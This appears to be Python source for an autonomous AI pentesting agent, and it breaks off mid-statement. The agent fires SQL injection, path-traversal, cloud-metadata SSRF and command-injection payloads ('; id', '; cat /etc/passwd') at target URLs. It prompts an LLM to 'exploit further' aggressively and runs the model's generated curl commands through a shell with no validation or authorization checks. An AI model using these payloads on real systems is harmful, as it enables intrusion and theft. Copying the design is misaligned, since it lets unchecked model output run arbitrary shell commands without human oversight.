import json import logging import re import subprocess import shlex import shutil import urllib.parse import os from typing import Dict, Any, List, Optional, Tuple from datetime import datetime from core.llm_manager import LLMManager logger = logging.getLogger(__name__) class BaseAgent: """ Autonomous AI-Powered Security Agent. This agent operates like a real pentester: 1. Discovers attack surface dynamically 2. Analyzes responses intelligently 3. Adapts testing based on findings 4. Intensifies when it finds something interesting 5. Documents real PoCs """ def __init__(self, agent_name: str, config: Dict, llm_manager: LLMManager, context_prompts: Dict): self.agent_name = agent_name self.config = config self.llm_manager = llm_manager self.context_prompts = context_prompts self.agent_role_config = self.config.get('agent_roles', {}).get(agent_name, {}) self.tools_allowed = self.agent_role_config.get('tools_allowed', []) self.description = self.agent_role_config.get('description', 'Autonomous Security Tester') # Attack surface discovered self.discovered_endpoints = [] self.discovered_params = [] self.discovered_forms = [] self.tech_stack = {} # Findings self.vulnerabilities = [] self.interesting_findings = [] self.tool_history = [] # Knowledge augmentation (opt-in via env) self.augmentor = None if os.getenv('ENABLE_KNOWLEDGE_AUGMENTATION', 'false').lower() == 'true': try: from core.knowledge_augmentor import KnowledgeAugmentor ka_config = config.get('knowledge_augmentation', {}) self.augmentor = KnowledgeAugmentor( dataset_path=ka_config.get('dataset_path', 'models/bug-bounty/bugbounty_finetuning_dataset.json'), max_patterns=ka_config.get('max_patterns_per_query', 3) ) logger.info("Knowledge augmentation enabled") except Exception as e: logger.warning(f"Knowledge augmentation init failed: {e}") # MCP tool client (opt-in via config) self.mcp_client = None if config.get('mcp_servers', {}).get('enabled', False): try: from core.mcp_client import MCPToolClient self.mcp_client = MCPToolClient(config) logger.info("MCP tool client enabled") except Exception as e: logger.warning(f"MCP client init failed: {e}") # Browser validation (opt-in via env) self.browser_validation_enabled = ( os.getenv('ENABLE_BROWSER_VALIDATION', 'false').lower() == 'true' ) logger.info(f"Initialized {self.agent_name} - Autonomous Agent") def _extract_targets(self, user_input: str) -> List[str]: """Extract target URLs from input.""" targets = [] if os.path.isfile(user_input.strip()): with open(user_input.strip(), 'r') as f: for line in f: line = line.strip() if line and not line.startswith('#'): targets.append(self._normalize_url(line)) return targets url_pattern = r'https?://[^\s<>"{}|\\^`\[\]]+' urls = re.findall(url_pattern, user_input) if urls: return [self._normalize_url(u) for u in urls] domain_pattern = r'\b(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}\b' domains = re.findall(domain_pattern, user_input) if domains: return [f"http://{d}" for d in domains] return [] def _normalize_url(self, url: str) -> str: url = url.strip() if not url.startswith(('http://', 'https://')): url = f"http://{url}" return url def _get_domain(self, url: str) -> str: parsed = urllib.parse.urlparse(url) return parsed.netloc or parsed.path.split('/')[0] def run_command(self, tool: str, args: str, timeout: int = 60) -> Dict: """Execute command and capture output.""" result = { "tool": tool, "args": args, "command": "", "success": False, "output": "", "timestamp": datetime.now().isoformat() } tool_path = self.config.get('tools', {}).get(tool) or shutil.which(tool) if not tool_path: result["output"] = f"[!] Tool '{tool}' not found - using alternative" logger.warning(f"Tool not found: {tool}") self.tool_history.append(result) return result try: if tool == "curl": cmd = f"{tool_path} {args}" else: cmd = f"{tool_path} {args}" result["command"] = cmd print(f" [>] {tool}: {args[:80]}{'...' if len(args) > 80 else ''}") proc = subprocess.run( cmd, shell=True, capture_output=True, text=True, timeout=timeout ) output = proc.stdout or proc.stderr result["output"] = output[:8000] if output else "[No output]" result["success"] = proc.returncode == 0 except subprocess.TimeoutExpired: result["output"] = f"[!] Timeout after {timeout}s" except Exception as e: result["output"] = f"[!] Error: {str(e)}" self.tool_history.append(result) return result def run_mcp_tool(self, tool_name: str, arguments: Optional[Dict] = None) -> Optional[str]: """Execute a tool via MCP if available, returns None for subprocess fallback.""" if not self.mcp_client or not self.mcp_client.enabled: return None import asyncio try: result = asyncio.run(self.mcp_client.try_tool(tool_name, arguments)) if result is not None: logger.info(f"MCP tool executed: {tool_name}") return result except Exception as e: logger.debug(f"MCP tool '{tool_name}' not available: {e}") return None def run_browser_validation(self, finding_id: str, url: str, payload: str = None) -> Dict: """Validate a finding using Playwright browser. Only executes if ENABLE_BROWSER_VALIDATION is set. Returns validation result with screenshots. """ if not self.browser_validation_enabled: return {"skipped": True, "reason": "Browser validation disabled"} try: from core.browser_validator import validate_finding_sync screenshots_dir = self.config.get('browser_validation', {}).get( 'screenshots_dir', 'reports/screenshots' ) return validate_finding_sync( finding_id=finding_id, url=url, payload=payload, screenshots_dir=f"{screenshots_dir}/{self.agent_name}", headless=self.config.get('browser_validation', {}).get('headless', True) ) except Exception as e: logger.error(f"Browser validation failed for {finding_id}: {e}") return {"finding_id": finding_id, "error": str(e)} def get_augmented_context(self, vulnerability_types: List[str]) -> str: """Get knowledge augmentation context for detected vulnerability types. Returns formatted pattern context string to inject into prompts. """ if not self.augmentor: return "" augmentation = "" technologies = list(self.tech_stack.get('detected', [])) for vtype in vulnerability_types[:3]: # Limit to avoid context bloat patterns = self.augmentor.get_relevant_patterns( vulnerability_type=vtype, technologies=technologies ) if patterns: augmentation += patterns return augmentation def execute(self, user_input: str, campaign_data: Dict = None, recon_context: Dict = None) -> Dict: """ Execute security assessment. If recon_context is provided, skip discovery and use the context. Otherwise extract targets and run discovery. """ # Check if we have recon context (pre-collected data) if recon_context: return self._execute_with_context(user_input, recon_context) # Legacy mode: extract targets and do discovery targets = self._extract_targets(user_input) if not targets: return { "error": "No targets found", "llm_response": "Please provide a URL, domain, IP, or file with targets." } print(f"\n{'='*70}") print(f" NEUROSPLOIT AUTONOMOUS AGENT - {self.agent_name.upper()}") print(f"{'='*70}") print(f" Mode: Adaptive AI-Driven Testing") print(f" Targets: {len(targets)}") print(f"{'='*70}\n") all_findings = [] for idx, target in enumerate(targets, 1): if len(targets) > 1: print(f"\n[TARGET {idx}/{len(targets)}] {target}") print("=" * 60) self.tool_history = [] self.vulnerabilities = [] self.discovered_endpoints = [] findings = self._autonomous_assessment(target) all_findings.extend(findings) final_report = self._generate_final_report(targets, all_findings) return { "agent_name": self.agent_name, "input": user_input, "targets": targets, "targets_count": len(targets), "tools_executed": len(self.tool_history), "vulnerabilities_found": len(self.vulnerabilities), "findings": all_findings, "llm_response": final_report, "scan_data": { "targets": targets, "tools_executed": len(self.tool_history), "endpoints_discovered": len(self.discovered_endpoints) } } def _execute_with_context(self, user_input: str, recon_context: Dict) -> Dict: """ ADAPTIVE AI Mode - Analyzes context sufficiency, runs tools if needed. Flow: 1. Analyze what user is asking for 2. Check if context has sufficient data 3. If insufficient → Run necessary tools to collect data 4. Perform final analysis with complete data """ target = recon_context.get('target', {}).get('primary_target', 'Unknown') print(f"\n{'='*70}") print(f" NEUROSPLOIT ADAPTIVE AI - {self.agent_name.upper()}") print(f"{'='*70}") print(f" Mode: Adaptive (LLM + Tools when needed)") print(f" Target: {target}") print(f" Context loaded with:") attack_surface = recon_context.get('attack_surface', {}) print(f" - Subdomains: {attack_surface.get('total_subdomains', 0)}") print(f" - Live hosts: {attack_surface.get('live_hosts', 0)}") print(f" - URLs: {attack_surface.get('total_urls', 0)}") print(f" - URLs with params: {attack_surface.get('urls_with_params', 0)}") print(f" - Open ports: {attack_surface.get('open_ports', 0)}") print(f" - Vulnerabilities: {attack_surface.get('vulnerabilities_found', 0)}") print(f"{'='*70}\n") # Extract context data data = recon_context.get('data', {}) urls_with_params = data.get('urls', {}).get('with_params', []) technologies = data.get('technologies', []) api_endpoints = data.get('api_endpoints', []) interesting_paths = data.get('interesting_paths', []) existing_vulns = recon_context.get('vulnerabilities', {}).get('all', []) unique_params = data.get('unique_params', {}) subdomains = data.get('subdomains', []) live_hosts = data.get('live_hosts', []) open_ports = data.get('open_ports', []) js_files = data.get('js_files', []) secrets = data.get('secrets', []) all_urls = data.get('urls', {}).get('all', []) # Phase 1: AI Analyzes Context Sufficiency print(f"[PHASE 1] Analyzing Context Sufficiency") print("-" * 50) context_summary = { "urls_with_params": len(urls_with_params), "total_urls": len(all_urls), "technologies": technologies, "api_endpoints": len(api_endpoints), "open_ports": len(open_ports), "js_files": len(js_files), "existing_vulns": len(existing_vulns), "subdomains": len(subdomains), "live_hosts": len(live_hosts), "params_found": list(unique_params.keys())[:20] } gaps = self._analyze_context_gaps(user_input, context_summary, target) self.tool_history = [] self.vulnerabilities = list(existing_vulns) # Phase 2: Run tools to fill gaps if needed if gaps.get('needs_tools', False): print(f"\n[PHASE 2] Collecting Missing Data") print("-" * 50) print(f" [!] Context insufficient for: {', '.join(gaps.get('missing', []))}") print(f" [*] Running tools to collect data...") self._fill_context_gaps(target, gaps, urls_with_params, all_urls) else: print(f"\n[PHASE 2] Context Sufficient") print("-" * 50) print(f" [+] All required data available in context") # Phase 3: Final AI Analysis print(f"\n[PHASE 3] AI Analysis") print("-" * 50) context_text = self._build_context_text(target, recon_context) llm_response = self._final_analysis(user_input, context_text, target) return { "agent_name": self.agent_name, "input": user_input, "targets": [target], "targets_count": 1, "tools_executed": len(self.tool_history), "vulnerabilities_found": len(self.vulnerabilities), "findings": self.tool_history, "llm_response": llm_response, "context_used": True, "mode": "adaptive", "scan_data": { "targets": [target], "tools_executed": len(self.tool_history), "context_based": True } } def _analyze_context_gaps(self, user_input: str, context_summary: Dict, target: str) -> Dict: """AI analyzes what user wants and what's missing in context.""" analysis_prompt = f"""Analyze this user request and context to determine what data is missing. USER REQUEST: {user_input} AVAILABLE CONTEXT DATA: - URLs with parameters: {context_summary['urls_with_params']} - Total URLs discovered: {context_summary['total_urls']} - Technologies detected: {', '.join(context_summary['technologies']) if context_summary['technologies'] else 'None'} - API endpoints: {context_summary['api_endpoints']} - Open ports scanned: {context_summary['open_ports']} - JavaScript files: {context_summary['js_files']} - Existing vulnerabilities: {context_summary['existing_vulns']} - Subdomains: {context_summary['subdomains']} - Live hosts: {context_summary['live_hosts']} - Parameters found: {', '.join(context_summary['params_found'][:15]) if context_summary['params_found'] else 'None'} TARGET: {target} DETERMINE what the user wants to test/analyze and if we have sufficient data. Respond in this EXACT format: NEEDS_TOOLS: YES or NO MISSING: [comma-separated list of what's missing] TESTS_NEEDED: [comma-separated list of test types needed: sqli, xss, lfi, ssrf, rce, port_scan, subdomain, crawl, etc.] URLS_TO_TEST: [list specific URLs from context to test, or DISCOVER if need to find URLs] REASON: [brief explanation]""" system = "You are a security assessment planner. Analyze context and determine data gaps. Be concise." response = self.llm_manager.generate(analysis_prompt, system) # Parse response gaps = { "needs_tools": False, "missing": [], "tests_needed": [], "urls_to_test": [], "reason": "" } for line in response.split('\n'): line = line.strip() if line.startswith('NEEDS_TOOLS:'): gaps['needs_tools'] = 'YES' in line.upper() elif line.startswith('MISSING:'): items = line.replace('MISSING:', '').strip().strip('[]') gaps['missing'] = [x.strip() for x in items.split(',') if x.strip()] elif line.startswith('TESTS_NEEDED:'): items = line.replace('TESTS_NEEDED:', '').strip().strip('[]') gaps['tests_needed'] = [x.strip().lower() for x in items.split(',') if x.strip()] elif line.startswith('URLS_TO_TEST:'): items = line.replace('URLS_TO_TEST:', '').strip().strip('[]') gaps['urls_to_test'] = [x.strip() for x in items.split(',') if x.strip() and x.startswith('http')] elif line.startswith('REASON:'): gaps['reason'] = line.replace('REASON:', '').strip() print(f" [*] User wants: {', '.join(gaps['tests_needed']) if gaps['tests_needed'] else 'general analysis'}") print(f" [*] Data sufficient: {'No' if gaps['needs_tools'] else 'Yes'}") if gaps['missing']: print(f" [*] Missing: {', '.join(gaps['missing'])}") return gaps def _fill_context_gaps(self, target: str, gaps: Dict, urls_with_params: List, all_urls: List): """Run tools to collect missing data based on identified gaps.""" tests_needed = gaps.get('tests_needed', []) urls_to_test = gaps.get('urls_to_test', []) # If no specific URLs, use from context if not urls_to_test or 'DISCOVER' in str(urls_to_test).upper(): urls_to_test = urls_with_params[:20] if urls_with_params else all_urls[:20] # Normalize target if not target.startswith(('http://', 'https://')): target = f"http://{target}" tools_run = 0 max_tools = 30 # XSS Testing if any(t in tests_needed for t in ['xss', 'cross-site', 'reflected', 'stored']): print(f"\n [XSS] Running XSS tests...") xss_payloads = [ '', '">', "'-alert(1)-'", '', '', '{{constructor.constructor("alert(1)")()}}', ] for url in urls_to_test[:8]: if tools_run >= max_tools: break if '=' in url: for payload in xss_payloads[:3]: if tools_run >= max_tools: break # Inject in last parameter test_url = self._inject_payload(url, payload) result = self.run_command("curl", f'-s -k "{test_url}"', timeout=30) self._check_vuln_indicators(result) tools_run += 1 # SQL Injection Testing if any(t in tests_needed for t in ['sqli', 'sql', 'injection', 'database']): print(f"\n [SQLi] Running SQL Injection tests...") sqli_payloads = [ "'", "' OR '1'='1", "1' OR '1'='1' --", "' UNION SELECT NULL--", "1; SELECT * FROM users--", "' AND 1=1--", ] for url in urls_to_test[:8]: if tools_run >= max_tools: break if '=' in url: for payload in sqli_payloads[:3]: if tools_run >= max_tools: break test_url = self._inject_payload(url, payload) result = self.run_command("curl", f'-s -k "{test_url}"', timeout=30) self._check_vuln_indicators(result) tools_run += 1 # LFI Testing if any(t in tests_needed for t in ['lfi', 'file', 'inclusion', 'path', 'traversal']): print(f"\n [LFI] Running LFI tests...") lfi_payloads = [ '../../etc/passwd', '....//....//....//etc/passwd', '/etc/passwd', 'php://filter/convert.base64-encode/resource=index.php', '....\\....\\....\\windows\\win.ini', ] for url in urls_to_test[:6]: if tools_run >= max_tools: break if '=' in url: for payload in lfi_payloads[:2]: if tools_run >= max_tools: break test_url = self._inject_payload(url, payload) result = self.run_command("curl", f'-s -k "{test_url}"', timeout=30) self._check_vuln_indicators(result) tools_run += 1 # SSRF Testing if any(t in tests_needed for t in ['ssrf', 'server-side', 'request']): print(f"\n [SSRF] Running SSRF tests...") ssrf_payloads = [ 'http://127.0.0.1:80', 'http://localhost:22', 'http://169.254.169.254/latest/meta-data/', 'file:///etc/passwd', ] for url in urls_to_test[:4]: if tools_run >= max_tools: break if '=' in url: for payload in ssrf_payloads[:2]: if tools_run >= max_tools: break test_url = self._inject_payload(url, payload) result = self.run_command("curl", f'-s -k "{test_url}"', timeout=30) self._check_vuln_indicators(result) tools_run += 1 # RCE Testing if any(t in tests_needed for t in ['rce', 'command', 'execution', 'shell']): print(f"\n [RCE] Running Command Injection tests...") rce_payloads = [ '; id', '| id', '`id`', '$(id)', '; cat /etc/passwd', ] for url in urls_to_test[:4]: if tools_run >= max_tools: break if '=' in url: for payload in rce_payloads[:2]: if tools_run >= max_tools: break test_url = self._inject_payload(url, payload) result = self.run_command("curl", f'-s -k "{test_url}"', timeout=30) self._check_vuln_indicators(result) tools_run += 1 # URL Discovery / Crawling if any(t in tests_needed for t in ['crawl', 'discover', 'spider', 'urls']): print(f"\n [CRAWL] Discovering URLs...") result = self.run_command("curl", f'-s -k "{target}"', timeout=30) tools_run += 1 # Extract links from response if result.get('output'): links = re.findall(r'(?:href|src|action)=["\']([^"\']+)["\']', result['output'], re.IGNORECASE) for link in links[:10]: if not link.startswith(('http://', 'https://', '//', '#', 'javascript:')): full_url = urllib.parse.urljoin(target, link) if full_url not in self.discovered_endpoints: self.discovered_endpoints.append(full_url) # Port Scanning if any(t in tests_needed for t in ['port', 'scan', 'nmap', 'service']): print(f"\n [PORTS] Checking common ports...") domain = self._get_domain(target) common_ports = [80, 443, 8080, 8443, 22, 21, 3306, 5432, 27017, 6379] for port in common_ports[:5]: if tools_run >= max_tools: break result = self.run_command("curl", f'-s -k -o /dev/null -w "%{{http_code}}" --connect-timeout 3 "http://{domain}:{port}/"', timeout=10) tools_run += 1 print(f"\n [+] Ran {tools_run} tool commands to fill context gaps") def _inject_payload(self, url: str, payload: str) -> str: """Inject payload into URL parameter.""" if '=' not in url: return url # URL encode the payload encoded_payload = urllib.parse.quote(payload, safe='') # Replace the last parameter value parts = url.rsplit('=', 1) if len(parts) == 2: return f"{parts[0]}={encoded_payload}" return url def _build_context_text(self, target: str, recon_context: Dict) -> str: """Build comprehensive context text for final analysis.""" attack_surface = recon_context.get('attack_surface', {}) data = recon_context.get('data', {}) urls_with_params = data.get('urls', {}).get('with_params', [])[:50] technologies = data.get('technologies', []) api_endpoints = data.get('api_endpoints', [])[:30] interesting_paths = data.get('interesting_paths', [])[:30] existing_vulns = recon_context.get('vulnerabilities', {}).get('all', [])[:20] unique_params = data.get('unique_params', {}) subdomains = data.get('subdomains', [])[:30] live_hosts = data.get('live_hosts', [])[:30] open_ports = data.get('open_ports', [])[:20] js_files = data.get('js_files', [])[:20] secrets = data.get('secrets', [])[:10] # Add tool results to context tool_results_text = "" if self.tool_history: tool_results_text = "\n\n**Security Tests Executed:**\n" for cmd in self.tool_history[-20:]: output = cmd.get('output', '')[:500] tool_results_text += f"\nCommand: {cmd.get('command', '')[:150]}\n" tool_results_text += f"Output: {output}\n" # Add found vulnerabilities vuln_text = "" if self.vulnerabilities: vuln_text = "\n\n**Vulnerabilities Detected During Testing:**\n" for v in self.vulnerabilities[:15]: vuln_text += f"- [{v.get('severity', 'INFO').upper()}] {v.get('type', 'Unknown')}\n" vuln_text += f" Evidence: {str(v.get('evidence', ''))[:200]}\n" return f"""=== RECONNAISSANCE CONTEXT FOR {target} === **Attack Surface Summary:** - Total Subdomains: {attack_surface.get('total_subdomains', 0)} - Live Hosts: {attack_surface.get('live_hosts', 0)} - Total URLs: {attack_surface.get('total_urls', 0)} - URLs with Parameters: {attack_surface.get('urls_with_params', 0)} - Open Ports: {attack_surface.get('open_ports', 0)} - Technologies Detected: {attack_surface.get('technologies_detected', 0)} **Subdomains Discovered:** {chr(10).join(f' - {s}' for s in subdomains)} **Live Hosts:** {chr(10).join(f' - {h}' for h in live_hosts)} **Technologies Detected:** {', '.join(technologies) if technologies else 'None detected'} **Open Ports:** {chr(10).join(f' - {p.get("port", "N/A")}/{p.get("protocol", "tcp")} - {p.get("service", "unknown")}' for p in open_ports) if open_ports else 'None scanned'} **URLs with Parameters (for injection testing):** {chr(10).join(f' - {u}' for u in urls_with_params)} **Unique Parameters Found:** {', '.join(list(unique_params.keys())[:50]) if unique_params else 'None'} **API Endpoints:** {chr(10).join(f' - {e}' for e in api_endpoints) if api_endpoints else 'None found'} **Interesting Paths:** {chr(10).join(f' - {p}' for p in interesting_paths) if interesting_paths else 'None found'} **JavaScript Files:** {chr(10).join(f' - {j}' for j in js_files) if js_files else 'None found'} **Existing Vulnerabilities from Recon:** {json.dumps(existing_vulns, indent=2) if existing_vulns else 'None found yet'} **Potential Secrets Exposed:** {chr(10).join(f' - {s[:80]}...' for s in secrets) if secrets else 'None found'} {tool_results_text} {vuln_text} === END OF CONTEXT ===""" def _final_analysis(self, user_input: str, context_text: str, target: str) -> str: """Generate final analysis based on user request and all collected data.""" system_prompt = self.context_prompts.get('system_prompt', '') if not system_prompt: system_prompt = f"""You are {self.agent_name}, an elite penetration tester and security researcher. You have been provided with reconnaissance data and security test results. Your task is to analyze this data and provide actionable security insights. Follow the user's instructions EXACTLY - they specify what they want you to analyze and how. When providing findings: 1. Be specific - reference actual URLs, parameters, and endpoints from the context 2. Provide PoC examples with exact curl commands 3. Include CVSS scores for vulnerabilities 4. Prioritize by severity (Critical > High > Medium > Low) 5. Include remediation recommendations Use the ACTUAL test results and evidence provided. If a vulnerability was detected during testing, document it with the exact evidence.""" user_prompt = f"""=== USER REQUEST === {user_input} === TARGET === {target} === RECONNAISSANCE DATA & TEST RESULTS === {context_text} === INSTRUCTIONS === Analyze ALL the data above including any security tests that were executed. Respond to the user's request thoroughly using the actual evidence collected. Provide working PoC commands using the real URLs and parameters. Document any vulnerabilities found during testing with CVSS scores.""" print(f" [*] Generating final analysis...") response = self.llm_manager.generate(user_prompt, system_prompt) print(f" [+] Analysis complete") return response def _ai_analyze_context(self, target: str, context: Dict, user_input: str) -> str: """AI analyzes the recon context and creates targeted attack plan.""" data = context.get('data', {}) urls_with_params = data.get('urls', {}).get('with_params', [])[:30] technologies = data.get('technologies', []) api_endpoints = data.get('api_endpoints', [])[:20] interesting_paths = data.get('interesting_paths', [])[:20] existing_vulns = context.get('vulnerabilities', {}).get('all', [])[:10] unique_params = data.get('unique_params', {}) analysis_prompt = f"""You are an elite penetration tester. Analyze this RECON CONTEXT and create an attack plan. USER REQUEST: {user_input} TARGET: {target} === RECON CONTEXT === **URLs with Parameters (test for injection):** {chr(10).join(urls_with_params[:30])} **Unique Parameters Found:** {', '.join(list(unique_params.keys())[:30]) if unique_params else 'None'} **Technologies Detected:** {', '.join(technologies)} **API Endpoints:** {chr(10).join(api_endpoints)} **Interesting Paths:** {chr(10).join(interesting_paths)} **Vulnerabilities Already Found:** {json.dumps(existing_vulns, indent=2) if existing_vulns else 'None yet'} === YOUR TASK === Based on this context, generate SPECIFIC tests to find vulnerabilities. For each test, output in this EXACT format: [TEST] curl -s -k "[URL_WITH_PAYLOAD]" [TEST] curl -s -k -X POST "[URL]" -d "param=payload" Focus on: 1. SQL Injection - test parameters with: ' " 1 OR 1=1 UNION SELECT 2. XSS - test inputs with: 3. LFI - test file params with: ../../etc/passwd php://filter 4. Auth bypass on API endpoints 5. IDOR on ID parameters Output at least 25 specific [TEST] commands targeting the URLs and parameters from context. Be creative. Think like a hacker.""" system = """You are an offensive security expert. Create specific curl commands to test vulnerabilities. Each command must be prefixed with [TEST] and be complete and executable. Target the actual endpoints and parameters from the recon context.""" response = self.llm_manager.generate(analysis_prompt, system) # Extract and run tests tests = re.findall(r'\[TEST\]\s*(.+?)(?=\[TEST\]|\Z)', response, re.DOTALL) print(f" [+] AI generated {len(tests)} targeted tests from context") for test in tests[:30]: test = test.strip() if test.startswith('curl'): cmd_match = re.match(r'(curl\s+.+?)(?:\n|$)', test) if cmd_match: cmd = cmd_match.group(1).strip() args = cmd[4:].strip() self.run_command("curl", args) return response def _context_based_exploitation(self, target: str, context: Dict, attack_plan: str): """AI-driven exploitation using context data.""" for iteration in range(8): print(f"\n [*] AI Exploitation Iteration {iteration + 1}") recent_results = self.tool_history[-15:] if len(self.tool_history) > 15 else self.tool_history results_context = "=== RECENT TEST RESULTS ===\n\n" for cmd in recent_results: output = cmd.get('output', '')[:2000] results_context += f"Command: {cmd.get('command', '')[:200]}\n" results_context += f"Output: {output}\n\n" exploitation_prompt = f"""You are actively exploiting {target}. {results_context} === ANALYZE AND DECIDE NEXT STEPS === Look at the results. Identify: 1. SQL errors = SQLi CONFIRMED - exploit further! 2. XSS reflection = XSS CONFIRMED - try variations! 3. File contents = LFI CONFIRMED - read more files! 4. Auth bypass = Document and explore! If you found something, DIG DEEPER. If a test failed, try different payloads. Output your next tests as: [EXEC] curl: [arguments] Or if done, respond with [DONE]""" system = "You are exploiting a target. Analyze results and output next commands." response = self.llm_manager.generate(exploitation_prompt, system) if "[DONE]" in response: print(" [*] AI completed exploitation phase") break commands = self._parse_ai_commands(response) if not commands: print(" [*] No more commands, moving on") break print(f" [*] AI requested {len(commands)} tests") for tool, args in commands[:10]: result = self.run_command(tool, args, timeout=60) self._check_vuln_indicators(result) def _autonomous_assessment(self, target: str) -> List[Dict]: """ Autonomous assessment with AI-driven adaptation. The AI analyzes each response and decides next steps. """ # Phase 1: Initial Reconnaissance & Discovery print(f"\n[PHASE 1] Autonomous Discovery - {target}") print("-" * 50) discovery_data = self._discover_attack_surface(target) # Phase 2: AI Analysis of Attack Surface print(f"\n[PHASE 2] AI Attack Surface Analysis") print("-" * 50) attack_plan = self._ai_analyze_attack_surface(target, discovery_data) # Phase 3: Adaptive Exploitation Loop print(f"\n[PHASE 3] Adaptive Exploitation") print("-" * 50) self._adaptive_exploitation_loop(target, attack_plan) # Phase 4: Deep Dive on Findings print(f"\n[PHASE 4] Deep Exploitation of Findings") print("-" * 50) self._deep_exploitation(target) return self.tool_history def _discover_attack_surface(self, target: str) -> Dict: """Dynamically discover all attack vectors.""" discovery = { "base_response": "", "headers": {}, "endpoints": [], "params": [], "forms": [], "tech_hints": [], "interesting_files": [] } # Get base response result = self.run_command("curl", f'-s -k -L -D - "{target}"') discovery["base_response"] = result.get("output", "") # Extract headers headers_match = re.findall(r'^([A-Za-z-]+):\s*(.+)$', discovery["base_response"], re.MULTILINE) discovery["headers"] = dict(headers_match) # Get HTML and extract links html_result = self.run_command("curl", f'-s -k "{target}"') html = html_result.get("output", "") # Extract all links links = re.findall(r'(?:href|src|action)=["\']([^"\']+)["\']', html, re.IGNORECASE) for link in links: if not link.startswith(('http://', 'https://', '//', '#', 'javascript:', 'mailto:')): full_url = urllib.parse.urljoin(target, link) if full_url not in discovery["endpoints"]: discovery["endpoints"].append(full_url) elif link.startswith('/'): full_url = urllib.parse.urljoin(target, link) if full_url not in discovery["endpoints"]: discovery["endpoints"].append(full_url) # Extract forms and inputs forms = re.findall(r']*action=["\']([^"\']*)["\'][^>]*>(.*?)', html, re.IGNORECASE | re.DOTALL) for action, form_content in forms: inputs = re.findall(r']*name=["\']([^"\']+)["\']', form_content, re.IGNORECASE) discovery["forms"].append({ "action": urllib.parse.urljoin(target, action) if action else target, "inputs": inputs }) # Extract URL parameters from links for endpoint in discovery["endpoints"]: parsed = urllib.parse.urlparse(endpoint) params = urllib.parse.parse_qs(parsed.query) for param in params.keys(): if param not in discovery["params"]: discovery["params"].append(param) # Check common files common_files = [ "robots.txt", "sitemap.xml", ".htaccess", "crossdomain.xml", "phpinfo.php", "info.php", "test.php", "admin/", "login.php", "wp-config.php.bak", ".git/config", ".env", "config.php.bak" ] for file in common_files[:8]: result = self.run_command("curl", f'-s -k -o /dev/null -w "%{{http_code}}" "{target}/{file}"') if result.get("output", "").strip() in ["200", "301", "302", "403"]: discovery["interesting_files"].append(f"{target}/{file}") # Detect technologies tech_patterns = { "PHP": [r'\.php', r'PHPSESSID', r'X-Powered-By:.*PHP'], "ASP.NET": [r'\.aspx?', r'ASP\.NET', r'__VIEWSTATE'], "Java": [r'\.jsp', r'JSESSIONID', r'\.do\b'], "Python": [r'Django', r'Flask', r'\.py'], "WordPress": [r'wp-content', r'wp-includes'], "MySQL": [r'mysql', r'MariaDB'], } full_response = discovery["base_response"] + html for tech, patterns in tech_patterns.items(): for pattern in patterns: if re.search(pattern, full_response, re.IGNORECASE): if tech not in discovery["tech_hints"]: discovery["tech_hints"].append(tech) self.discovered_endpoints = discovery["endpoints"] print(f" [+] Discovered {len(discovery['endpoints'])} endpoints") print(f" [+] Found {len(discovery['params'])} parameters") print(f" [+] Found {len(discovery['forms'])} forms") print(f" [+] Tech hints: {', '.join(discovery['tech_hints']) or 'Unknown'}") return discovery def _ai_analyze_attack_surface(self, target: str, discovery: Dict) -> str: """AI analyzes discovered surface and creates attack plan.""" analysis_prompt = f"""You are an elite penetration tester analyzing an attack surface. TARGET: {target} === DISCOVERED ATTACK SURFACE === **Endpoints Found ({len(discovery['endpoints'])}):** {chr(10).join(discovery['endpoints'][:20])} **Parameters Found:** {', '.join(discovery['params'][:20])} **Forms Found:** {json.dumps(discovery['forms'][:10], indent=2)} **Technologies Detected:** {', '.join(discovery['tech_hints'])} **Interesting Files:** {chr(10).join(discovery['interesting_files'])} **Response Headers:** {json.dumps(dict(list(discovery['headers'].items())[:10]), indent=2)} === YOUR TASK === Analyze this attack surface and output SPECIFIC tests to run. For each test, output in this EXACT format: [TEST] curl -s -k "[URL_WITH_PAYLOAD]" [TEST] curl -s -k "[URL]" -d "param=payload" Focus on: 1. SQL Injection - test EVERY parameter with: ' " 1 OR 1=1 UNION SELECT 2. XSS - test inputs with: 3. LFI - test file params with: ../../etc/passwd php://filter 4. Auth bypass - test login forms with SQLi 5. IDOR - test ID params with different values Output at least 20 specific [TEST] commands targeting the discovered endpoints and parameters. Be creative. Think like a hacker. Test edge cases.""" system = """You are an offensive security expert. Output specific curl commands to test vulnerabilities. Each command must be prefixed with [TEST] and be a complete, executable curl command. Target the actual endpoints and parameters discovered. Be aggressive.""" response = self.llm_manager.generate(analysis_prompt, system) # Extract and run the tests tests = re.findall(r'\[TEST\]\s*(.+?)(?=\[TEST\]|\Z)', response, re.DOTALL) print(f" [+] AI generated {len(tests)} targeted tests") for test in tests[:25]: test = test.strip() if test.startswith('curl'): # Extract just the curl command cmd_match = re.match(r'(curl\s+.+?)(?:\n|$)', test) if cmd_match: cmd = cmd_match.group(1).strip() # Remove the 'curl' part and run args = cmd[4:].strip() self.run_command("curl", args) return response def _adaptive_exploitation_loop(self, target: str, attack_plan: str): """ AI-driven exploitation loop. The AI analyzes results and decides what to test next. """ for iteration in range(10): print(f"\n [*] AI Exploitation Iteration {iteration + 1}") # Build context from recent results recent_results = self.tool_history[-15:] if len(self.tool_history) > 15 else self.tool_history context = "=== RECENT TEST RESULTS ===\n\n" for cmd in recent_results: output = cmd.get('output', '')[:2000] context += f"Command: {cmd.get('command', '')[:200]}\n" context += f"Output: {output}\n\n" exploitation_prompt = f"""You are actively exploiting {target}. {context} === ANALYZE AND DECIDE NEXT STEPS === Look at the results above. Identify: 1. SQL errors (mysql_fetch, syntax error, ODBC, etc.) = SQLi CONFIRMED - exploit further! 2. XSS reflection (your payload appears in output) = XSS CONFIRMED - try variations! 3. File contents (root:x:0, [boot loader], etc.) = LFI CONFIRMED - read more files! 4. Authentication bypassed = Document and explore! 5. Error messages revealing info = Use for further attacks! If you found something interesting, DIG DEEPER with variations. If a test returned errors, try different payloads. Output your next tests as: [EXEC] curl: [arguments] Or if you've thoroughly tested and found enough, respond with [DONE] Be aggressive. Vary payloads. Test edge cases. Chain vulnerabilities.""" system = """You are an elite hacker in the middle of exploiting a target. Analyze results, identify vulnerabilities, and output next commands. Format: [EXEC] tool: arguments When done, say [DONE]""" response = self.llm_manager.generate(exploitation_prompt, system) if "[DONE]" in response: print(" [*] AI completed exploitation phase") break # Parse and execute commands commands = self._parse_ai_commands(response) if not commands: print(" [*] No more commands, moving to next phase") break print(f" [*] AI requested {len(commands)} tests") for 